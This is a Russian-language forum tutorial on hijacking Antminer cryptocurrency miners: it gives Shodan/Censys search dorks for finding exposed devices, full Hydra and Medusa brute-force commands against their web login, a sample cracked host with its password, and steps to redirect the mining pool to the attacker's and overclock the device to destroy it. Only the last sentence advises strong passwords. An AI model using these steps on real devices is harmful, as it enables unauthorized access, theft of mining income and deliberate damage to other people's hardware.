Брут Майнеров
Мы будем брутить майнеры Antminer и майнить на них.
Для начала нам нужны ip адреса майнеров, получить их можно несколькими способами:
- Майнер отправляет в сеть много информации, перехватывая которую можно собрать ключевые слова и составить особые дорки для поиска по специальным поисковикам
shodan
censys
брутим1.jpg
Код:
"antMiner Configuration"
- Просканировать диапазоны ip адресов c 80/8080 портом на необходимый нам заголовок.
брутим2.jpg
После сбора необходимых ip будем брутить их при помощи Hydra(Рекомендуется использовать Linux для запуска), на всех майнерах установлена Digest Auth на вход с дефолтным логином root.
Обращаем внимание где есть доступ по SSH, это ещё одна «дверь». Если перейти по ip-адресу, то мы обязательно увидим всеми знакомое окошко авторизации:
брутим3.jpg
Конечно же не надейтесь что там стандартный логин-пароль.
А вот теперь пора достовать Kali Lunix на мультизагрузочной флешке и расчехлять программу для брутфорса по различным протоколам.
Hydra мощнейший инструмент, для работы с различными протоколами , имеет следующие ключи работы:
Options:
s PORT if the service is on a different default port, define it here
l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
p PASS or -P FILE try password PASS, or load several passwords from FILE
x MIN:MAX:CHARSET password bruteforce generation, type «-x -h» to get help
e nsr try «n» null password, «s» login as pass and/or «r» reversed login
u loop around users, not passwords (effective! implied with -x)
C FILE colon separated «login:pass» format, instead of -L/-P options
M FILE list of servers to attack, one entry per line, ‘:’ to specify port
o FILE write found login/password pairs to FILE instead of stdout
f / -F exit when a login/pass pair is found (-M: -f per host, -F global)
t TASKS run TASKS number of connects in parallel (per host, default: 16)
w / -W TIME waittime for responses (32s) / between connects per thread
4 / -6 use IPv4 (default) / IPv6 addresses (put always in [] also in -M)
v / -V / -d verbose mode / show login+pass for each attempt / debug mode
O use old SSL v2 and v3
q do not print messages about connection errors
U service module usage details
server the target: DNS, IP or 192.168.0.0/24 (this OR the -M option)
service the service to crack (see below for supported protocols)
OPT some service modules support additional input (-U for module help)
Examples:
hydra -l user -P passlist.txt ftp://192.168.0.1
hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
hydra -l admin -p password ftp://[192.168.0.0/24]/
hydra -L logins.txt -P pws.txt -M targets.txt ssh
Рассмотрим такой пример:
брутим4.jpg
Тут мы имеем:
Ip-адрес сервера 192.168.1.2
Сервис HTTP
Закрытый путь /private/
Порт 80 (стандартный)
Допустим что мы знаем логин и это будет root
для брутфорса пароля использовать будем словарь из 50000 распространённых паролей.
И модуль http-get
Запускаем наш брут:
Код:
EN-US">$ hydra -l root -P ~/pass_lists/50000pass.txt -o ./hydra_result.log -f -V -s 80 192.168.1.2 http-get /private/
Если же пароль будет найден гидра сообщит вам об этом. Аналогично гидрой можно брутить и FTP и SSH.
Взлом не будет сложным, если были использованы простые пароли, ещё проще с циферными.
В Kali Lunix есть прекрасная возможность самому создавать пароли с помощью утилиты Crunch. За несколько минут можно создать список со всеми возможными номерами мобильных телефонов или дат рождения. Но это мы оставим на потом, для утилит kali lunix можно сделать просто целую огромную ветку.
Upd:
Второй вариант брута на Medusa под Windows 10 без использования бинарников и без установки Linux:
Устанавливаем Kali/ubuntu из Магазина приложений Windows.
Следуем подсказкам и устанавливаем свой root пароль.
Устанавливаем медузу:
Код:
EN-US">sudo su apt-get install medusa.
- Запускаем медузу
Код:
EN-US">medusa -H ip.txt -u root -P passwordlist.txt -O ./results.txt -M http -t 100 -f
passwordlist.txt — список паролей.
results.txt — выходной файл с результатами брута.
ip.txt — входной файл с ip адресами.
Если вам повезет, то в выходном файле будут следующие строчки:
[80][http-get] host: 95.238.104.99 login: root password: camelot
Логинимся по полученным данным и меняем данные пула на свои.
Так же вы можете изменить частоту майнера до максимальных, и изменить скорость вращения кулеров, тем самым спалив чей-то майнер, действенно на AntMiner L3+.
В заключении хочу заметить, что использование стандартных паролей или простых циферных и буквенных паролей , очень сильно подрывает безопасность ваших устройств, веб страниц и так далее. Использование комбинированых паролей и разных для различных сервисов, сведут на нет возможность похищения конфиденциальной информации.